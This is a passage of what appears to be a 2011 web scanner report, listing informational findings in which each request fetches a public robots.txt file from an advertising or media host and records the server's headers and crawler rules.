Content-Type: text/plain; charset=UTF-8

User-Agent: *
Disallow: /api/
Disallow: /app/
Disallow: /css/
Disallow: /dpp/
Disallow: /img/
Disallow: /js/
Disallow: /optout/
Disallow: /php/
Disallow: /ps/
Disallow: /swf/
Disallow: /test/

27.2. http://a.netmng.com/opt-status.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.netmng.com
Path:   /opt-status.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: a.netmng.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 10:59:07 GMT
Server: Apache/2.2.9
Last-Modified: Fri, 19 Nov 2010 17:37:21 GMT
ETag: "c43a9-1a-4956b5bcc5640"
Accept-Ranges: bytes
Content-Length: 26
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /

27.3. http://a.rfihub.com/nai_check_status.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.rfihub.com
Path:   /nai_check_status.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: a.rfihub.com

Response

HTTP/1.1 200 OK
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Content-Type: text/plain; charset=iso-8859-1
Content-Length: 26

User-agent: *
Disallow: /

27.4. http://a.tribalfusion.com/displayAd.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /displayAd.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: a.tribalfusion.com

Response

HTTP/1.0 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 305
X-Reuse-Index: 1
Content-Type: text/plain
Content-Length: 26
Connection: Close

User-agent: *
Disallow: /

27.5. http://ad-apac.doubleclick.net/adi/N5840.139243.NATIONMULTIMEDIA.CO/B4833719.2  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad-apac.doubleclick.net
Path:   /adi/N5840.139243.NATIONMULTIMEDIA.CO/B4833719.2

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ad-apac.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/plain
Content-Length: 101
Last-Modified: Thu, 18 Mar 2010 15:31:04 GMT
Date: Sun, 04 Sep 2011 04:04:44 GMT

User-Agent: AdsBot-Google
Disallow:

User-Agent: MSNPTC
Disallow:

User-agent: *
Disallow: /

27.6. http://ad.afy11.net/ad  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.afy11.net
Path:   /ad

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ad.afy11.net

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Fri, 06 Jul 2007 06:09:38 GMT
Accept-Ranges: bytes
ETag: "78f7133c94bfc71:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 03:58:43 GMT
Connection: close
Content-Length: 30

User-agent: *
Disallow: /


27.7. http://ad.doubleclick.net/adj/N3340.152125.OZONEMEDIA.COM/B5807973  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N3340.152125.OZONEMEDIA.COM/B5807973

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/plain
Content-Length: 101
Last-Modified: Thu, 18 Mar 2010 15:31:04 GMT
Date: Sun, 04 Sep 2011 04:05:51 GMT

User-Agent: AdsBot-Google
Disallow:

User-Agent: MSNPTC
Disallow:

User-agent: *
Disallow: /

27.8. http://ad.turn.com/server/ads.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /server/ads.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ad.turn.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Content-Type: text/html;charset=UTF-8
Date: Sun, 04 Sep 2011 02:40:44 GMT
Connection: close

User-agent: *
Disallow: /app
Disallow: /server

27.9. http://ad.yieldmanager.com/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /pixel

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ad.yieldmanager.com

Response

HTTP/1.0 200 OK
Date: Sun, 04 Sep 2011 02:38:43 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Sun, 04 Sep 2011 02:38:43 GMT
Pragma: no-cache
Content-Length: 26
Content-Type: text/plain
Age: 0

User-agent: *
Disallow: /

27.10. http://ad4.liverail.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad4.liverail.com
Path:   /crossdomain.xml

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ad4.liverail.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Accept-Ranges: bytes
ETag: "2560517043"
Last-Modified: Thu, 01 Sep 2011 20:21:26 GMT
Content-Length: 27
Connection: close
Date: Sun, 04 Sep 2011 02:41:41 GMT
Server: lighttpd/1.4.28

User-agent: *
Disallow: /


27.11. http://adclick.g.doubleclick.net/aclk  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adclick.g.doubleclick.net
Path:   /aclk

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: adclick.g.doubleclick.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Sun, 04 Sep 2011 04:06:40 GMT
Server: AdClickServer
Cache-Control: private
X-XSS-Protection: 1; mode=block

User-Agent: *
Disallow: /
Noindex: /

27.12. http://adcontent.videoegg.com/ads/MicrosoftOffice/Office7Upgra-USA-13364/AdFramesV2/office7Upgrade_Twig.swf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adcontent.videoegg.com
Path:   /ads/MicrosoftOffice/Office7Upgra-USA-13364/AdFramesV2/office7Upgrade_Twig.swf

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: adcontent.videoegg.com

Response

HTTP/1.0 200 OK
Server: Apache
ETag: "f71d20196d4caf35b6a670db8c70b03d:1277939006"
Last-Modified: Wed, 30 Jun 2010 23:03:26 GMT
Content-Type: text/plain
Cache-Control: max-age=1800
Expires: Sun, 04 Sep 2011 03:49:47 GMT
Content-Length: 26
Date: Sun, 04 Sep 2011 03:19:47 GMT
Connection: close

User-agent: *
Disallow: /

27.13. http://ads.amgdgt.com/ads/opt-out  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.amgdgt.com
Path:   /ads/opt-out

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ads.amgdgt.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 11:00:21 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Thu, 19 Mar 2009 21:31:08 GMT
ETag: "b044005-1a-4657f84ac9f00"
Accept-Ranges: bytes
Content-Length: 26
Cache-Control: max-age=172800
Expires: Tue, 06 Sep 2011 11:00:21 GMT
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /

27.14. http://ads.bluelithium.com/st  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.bluelithium.com
Path:   /st

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ads.bluelithium.com

Response

HTTP/1.0 200 OK
Date: Sun, 04 Sep 2011 02:42:22 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Sun, 04 Sep 2011 02:42:22 GMT
Pragma: no-cache
Content-Length: 26
Content-Type: text/plain
Age: 0

User-agent: *
Disallow: /

27.15. http://ads.indiatimes.com/ads.dll/getad  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.indiatimes.com
Path:   /ads.dll/getad

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ads.indiatimes.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=2592000
Content-Length: 25
Content-Type: text/plain
Last-Modified: Tue, 27 May 2008 12:47:08 GMT
Accept-Ranges: bytes
ETag: "448688c6f7bfc81:402"
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 02:35:05 GMT
Connection: close

User-Agent: *
Allow: /

27.16. http://ads.reach360ads.com/www/ads/iframe.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.reach360ads.com
Path:   /www/ads/iframe.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ads.reach360ads.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:34:35 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Mon, 01 Mar 2010 21:07:18 GMT
ETag: "6c80185-17a-480c3a25fad80"
Accept-Ranges: bytes
Content-Length: 378
Connection: close
Content-Type: text/plain; charset=UTF-8

# This robots.txt file requests that search engines and other
# automated web-agents don't try to index the files in this
# directory (/). This file is required in the event that you
# use OpenX witho
...[SNIP]...

27.17. http://ads.undertone.com/fc.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.undertone.com
Path:   /fc.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ads.undertone.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Mon, 29 Aug 2011 20:44:50 GMT
ETag: "30b040a-1a-4abaaf7619480"
Content-Type: text/plain; charset=UTF-8
Date: Sun, 04 Sep 2011 10:59:45 GMT
Content-Length: 26
Connection: close

User-agent: *
Disallow: /

27.18. http://ads3.bangkokpost.co.th/www/delivery/spc.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads3.bangkokpost.co.th
Path:   /www/delivery/spc.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ads3.bangkokpost.co.th

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:25:06 GMT
Server: Apache/2.2.10 (Win32) PHP/5.2.13
Last-Modified: Tue, 18 Nov 2008 08:01:51 GMT
ETag: "10000000027f9-17a-45bf21bb0861f"
Accept-Ranges: bytes
Content-Length: 378
Cache-Control: max-age=1209600
Expires: Sun, 18 Sep 2011 02:25:06 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

# This robots.txt file requests that search engines and other
# automated web-agents don't try to index the files in this
# directory (/). This file is required in the event that you
# use OpenX witho
...[SNIP]...

27.19. http://adscontent.indiatimes.com/photo/7596584.cms  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adscontent.indiatimes.com
Path:   /photo/7596584.cms

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: adscontent.indiatimes.com

Response

HTTP/1.0 200 OK
Content-Length: 25
Content-Type: text/plain
Last-Modified: Tue, 27 May 2008 12:47:08 GMT
Accept-Ranges: bytes
ETag: "448688c6f7bfc81:3fe"
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Cache-Control: max-age=2370341
Date: Sun, 04 Sep 2011 02:37:35 GMT
Connection: close

User-Agent: *
Allow: /

27.20. http://adscontent2.indiatimes.com/photo/9101637.cms  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adscontent2.indiatimes.com
Path:   /photo/9101637.cms

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: adscontent2.indiatimes.com

Response

HTTP/1.0 200 OK
Content-Length: 25
Content-Type: text/plain
Last-Modified: Tue, 27 May 2008 12:47:08 GMT
Accept-Ranges: bytes
ETag: "448688c6f7bfc81:507"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: max-age=30971267
Date: Sun, 04 Sep 2011 02:30:31 GMT
Connection: close

User-Agent: *
Allow: /

27.21. http://adserver.adtech.de/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adserver.adtech.de
Path:   /crossdomain.xml

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: adserver.adtech.de

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: no-cache
Content-Type: text/html
Content-Length: 26

User-agent: *
Disallow: /

27.22. http://adserver.adtechus.com/addyn/3.0/5132/1305477/0/170/ADTECH  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /addyn/3.0/5132/1305477/0/170/ADTECH

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: adserver.adtechus.com

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: no-cache
Content-Type: text/html
Content-Length: 26

User-agent: *
Disallow: /

27.23. http://advertising.aol.com/nai/nai.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /nai/nai.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: advertising.aol.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 10:59:23 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Last-Modified: Sun, 16 Jan 2011 18:42:47 GMT
ETag: "64003c-624-499fb089a17c0"
Accept-Ranges: bytes
Content-Length: 1572
Cache-Control: max-age=1209600
Expires: Sun, 18 Sep 2011 10:59:23 GMT
Keep-Alive: timeout=15, max=79
Connection: Keep-Alive
Content-Type: text/plain

# $Id: robots.txt,v 1.9.2.2 2010/09/06 10:37:16 goba Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites
...[SNIP]...

27.24. https://adwords.google.com/um/StartNewLogin  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://adwords.google.com
Path:   /um/StartNewLogin

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: adwords.google.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Sun, 04 Sep 2011 04:12:05 GMT
Expires: Sun, 04 Sep 2011 04:12:05 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE

User-agent: *
Allow: /support/
Disallow: /

User-Agent: Googlebot
Allow: /
Allow: /support/
Disallow: /*?

27.25. http://api.facebook.com/restserver.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.facebook.com
Path:   /restserver.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: api.facebook.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=2592000
Content-Type: text/plain; charset=utf-8
Expires: Tue, 04 Oct 2011 03:08:03 GMT
X-FB-Server: 10.54.12.23
Connection: close
Content-Length: 26

User-agent: *
Disallow: /

27.26. http://as.casalemedia.com/j  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://as.casalemedia.com
Path:   /j

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: as.casalemedia.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Tue, 07 Sep 2010 18:44:55 GMT
ETag: "15683a6-1a-cb0517c0"
Accept-Ranges: bytes
Content-Length: 26
Content-Type: text/plain
Expires: Sun, 04 Sep 2011 02:37:34 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 04 Sep 2011 02:37:34 GMT
Connection: close

User-agent: *
Disallow: /

27.27. http://as.serving-sys.com/OptOut/nai_optout_results.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://as.serving-sys.com
Path:   /OptOut/nai_optout_results.aspx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: as.serving-sys.com

Response

HTTP/1.1 200 OK
Connection: close
Content-Length: 26
Content-Type: text/plain
Last-Modified: Thu, 19 Aug 2010 19:43:18 GMT
Accept-Ranges: bytes
ETag: "08f8bc5d63fcb1:1c7e7"
P3P: policyref=http://www.eyeblaster.com/p3p/Eyeblaster-served-p3p2.xml,CP="NOI DEVa OUR BUS UNI"
X-UA-Compatible: IE=EmulateIE8

User-agent: *
Disallow: /

27.28. http://avn.innity.com/avnview.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://avn.innity.com
Path:   /avnview.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: avn.innity.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:12:31 GMT
Server: Apache
Last-Modified: Fri, 25 Apr 2008 12:09:16 GMT
ETag: "2c6b4-1a-44bb16f555300"
Accept-Ranges: bytes
Content-Length: 26
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /

27.29. http://b.scorecardresearch.com/b  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /b

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 06 Jan 2010 17:35:59 GMT
Content-Length: 28
Content-Type: text/plain
Expires: Mon, 05 Sep 2011 02:33:40 GMT
Date: Sun, 04 Sep 2011 02:33:40 GMT
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

User-agent: *
Disallow: /

27.30. http://blogs.timesofindia.indiatimes.com/main/page/recentEntriesFeed  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.timesofindia.indiatimes.com
Path:   /main/page/recentEntriesFeed

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: blogs.timesofindia.indiatimes.com

Response

HTTP/1.0 200 OK
Server: Apache-Coyote/1.1
ETag: W/"22-1314721790000"
Last-Modified: Tue, 30 Aug 2011 16:29:50 GMT
Content-Type: text/plain
Date: Sun, 04 Sep 2011 02:33:52 GMT
Content-Length: 22
Connection: close

User-agent: *
Allow: /

27.31. http://c7.zedo.com/img/bh.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /img/bh.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: c7.zedo.com

Response

HTTP/1.0 200 OK
Server: ZEDO 3G
Last-Modified: Tue, 31 May 2005 07:08:00 GMT
ETag: "296db4-4c-3f861aa21f400"
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: text/plain
Date: Sun, 04 Sep 2011 03:59:04 GMT
Content-Length: 76
Connection: close

# Officer Barbrady says "Nothing to see here...."
User-agent: *
Disallow: /

27.32. http://cas.criteo.com/delivery/afr.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cas.criteo.com
Path:   /delivery/afr.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: cas.criteo.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Date: Sun, 04 Sep 2011 03:56:54 GMT
Connection: close
Content-Length: 26

User-agent: *
Disallow: /

27.33. http://cdn.dnaindia.com/images/710/favicon-google-bookmark.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.dnaindia.com
Path:   /images/710/favicon-google-bookmark.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: cdn.dnaindia.com

Response

HTTP/1.0 200 OK
x-amz-id-2: TnR9Tgo5DEiWkbCHisqmUVLHZEsS2m9+vqDcuOd84oG2p6bKeU/RhAy/GnZp1Vx/
x-amz-request-id: 97E9959FD4D56031
Date: Fri, 02 Sep 2011 21:25:20 GMT
Last-Modified: Wed, 03 Nov 2010 08:11:13 GMT
ETag: "6c0c0b02c59a0e5b43917105fbeae507"
Accept-Ranges: bytes
Content-Type: text/plain
Content-Length: 28
Server: AmazonS3
X-Cache: RefreshHit from cloudfront
X-Amz-Cf-Id: 986152c9417d63db614cc103c80f46dbfa0e7346ad5ebf95c75dd82a81fdab271d92e604a5156cb6
Via: 1.0 a4a33eb6d328de8565b9c9b34e7c790d.cloudfront.net:11180 (CloudFront), 1.0 9944d439be34815bf637b293c33c4694.cloudfront.net:11180 (CloudFront)
Connection: close

User-agent: *
Disallow: /

27.34. http://cdn.optmd.com/V2/88918/233260/index.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.optmd.com
Path:   /V2/88918/233260/index.html

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: cdn.optmd.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Fri, 24 Jun 2005 22:51:33 GMT
ETag: "d54bba-1a-3fa51a4b8c740"
Accept-Ranges: bytes
Content-Length: 26
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/plain; charset=UTF-8
Date: Sun, 04 Sep 2011 02:38:52 GMT
Connection: close

User-agent: *
Disallow: /

27.35. http://cdn.turn.com/server/ddc.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.turn.com
Path:   /server/ddc.htm

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: cdn.turn.com

Response

HTTP/1.0 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Pragma: no-cache
Content-Type: text/html;charset=UTF-8
Cache-Control: private, no-cache, no-store, must-revalidate
Date: Sun, 04 Sep 2011 02:41:22 GMT
Content-Length: 47
Connection: close

User-agent: *
Disallow: /app
Disallow: /server

27.36. http://clk.atdmt.com/goiframe/171946551/278612752/direct  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://clk.atdmt.com
Path:   /goiframe/171946551/278612752/direct

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: clk.atdmt.com

Response

HTTP/1.1 200 OK
Content-Length: 101
Content-Type: text/html
Date: Sun, 04 Sep 2011 04:13:35 GMT
Connection: close

User-agent: *
Disallow: /

User-Agent: AdsBot-Google
Disallow:

User-Agent: MSNPTC
Disallow:

27.37. http://clk.fetchback.com/serve/fb/click  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://clk.fetchback.com
Path:   /serve/fb/click

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: clk.fetchback.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:13:37 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 02 Sep 2009 11:29:17 GMT
Accept-Ranges: bytes
Content-Length: 255
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

##
## Created: June 10th 2007. (nikolas@codesquare.com)
## Updated: November 16th 2007. (nikolas@codesquare.com)
##
##
User-agent: *

Disallow: /reports
Disallow: /dev
Disallow: /tmp
Disallow: /hub
Di
...[SNIP]...

27.38. http://cm.g.doubleclick.net/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cm.g.doubleclick.net
Path:   /pixel

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: cm.g.doubleclick.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Sun, 04 Sep 2011 04:13:37 GMT
Server: Cookie Matcher
Cache-Control: private
X-XSS-Protection: 1; mode=block

User-Agent: *
Disallow: /
Noindex: /

27.39. http://cps.regis.edu/lp/computer_degree/it_degree.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cps.regis.edu
Path:   /lp/computer_degree/it_degree.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: cps.regis.edu

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:13:14 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7a DAV/2 mod_bwlimited/1.4
Last-Modified: Wed, 23 Mar 2011 22:21:23 GMT
Accept-Ranges: bytes
Content-Length: 399
Cache-Control: max-age=216000, public, must-revalidate
Expires: Sun, 04 Sep 2011 04:13:15 GMT
Connection: close
Content-Type: text/plain

# Allow all
User-agent: *
Disallow: /_private
Disallow: /_vti_bin
Disallow: /_vti_cnf
Disallow: /_vit_log
Disallow: /_vti_txt
Disallow: /blog/wp-admin
Disallow: /blog/wp-includes
Disallow: /cgi-bin
D
...[SNIP]...

27.40. http://d.tradex.openx.com/afr.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d.tradex.openx.com
Path:   /afr.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: d.tradex.openx.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 03:27:16 GMT
Server: Apache
Last-Modified: Tue, 21 Dec 2010 00:56:43 GMT
ETag: "17f3b5-131-497e11c2d28c0"
Accept-Ranges: bytes
Content-Length: 305
Connection: close
Content-Type: text/plain; charset=UTF-8

# This robots.txt file requests that search engines and other
# automated web-agents don't try to index the files in this
# directory (/www/delivery/). This file is required in the
# event that you us
...[SNIP]...

27.41. http://d13.zedo.com/OzoDB/cutils/R53_7_5/jsc/767/zpu.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d13.zedo.com
Path:   /OzoDB/cutils/R53_7_5/jsc/767/zpu.html

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: d13.zedo.com

Response

HTTP/1.0 200 OK
Server: ZEDO 3G
Last-Modified: Mon, 18 May 2009 07:39:20 GMT
ETag: "3a9d10f-4c-46a2ae4677a00"
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: text/plain
Date: Sun, 04 Sep 2011 02:41:24 GMT
Content-Length: 76
Connection: close

# Officer Barbrady says "Nothing to see here...."
User-agent: *
Disallow: /

27.42. http://d2.zedo.com/jsc/d2/ff2.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d2.zedo.com
Path:   /jsc/d2/ff2.html

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: d2.zedo.com

Response

HTTP/1.0 200 OK
Server: ZEDO 3G
Last-Modified: Mon, 18 May 2009 07:39:20 GMT
ETag: "3a9d10f-4c-46a2ae4677a00"
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: text/plain
Date: Sun, 04 Sep 2011 02:43:58 GMT
Content-Length: 76
Connection: close

# Officer Barbrady says "Nothing to see here...."
User-agent: *
Disallow: /

27.43. http://d3.zedo.com/jsc/d3/ff2.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d3.zedo.com
Path:   /jsc/d3/ff2.html

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: d3.zedo.com

Response

HTTP/1.0 200 OK
Server: ZEDO 3G
Last-Modified: Mon, 18 May 2009 07:39:20 GMT
ETag: "3a9d10f-4c-46a2ae4677a00"
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: text/plain
Date: Sun, 04 Sep 2011 02:37:34 GMT
Content-Length: 76
Connection: close

# Officer Barbrady says "Nothing to see here...."
User-agent: *
Disallow: /

27.44. http://d7.zedo.com/bar/v16-504/d8/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-504/d8/jsc/fm.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: d7.zedo.com

Response

HTTP/1.0 200 OK
Server: ZEDO 3G
Last-Modified: Mon, 18 May 2009 07:39:20 GMT
ETag: "3a9d10f-4c-46a2ae4677a00"
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: text/plain
Date: Sun, 04 Sep 2011 02:31:37 GMT
Content-Length: 76
Connection: close

# Officer Barbrady says "Nothing to see here...."
User-agent: *
Disallow: /

27.45. http://dis.criteo.com/dis/rtb/google/cookiematch.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dis.criteo.com
Path:   /dis/rtb/google/cookiematch.aspx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: dis.criteo.com

Response

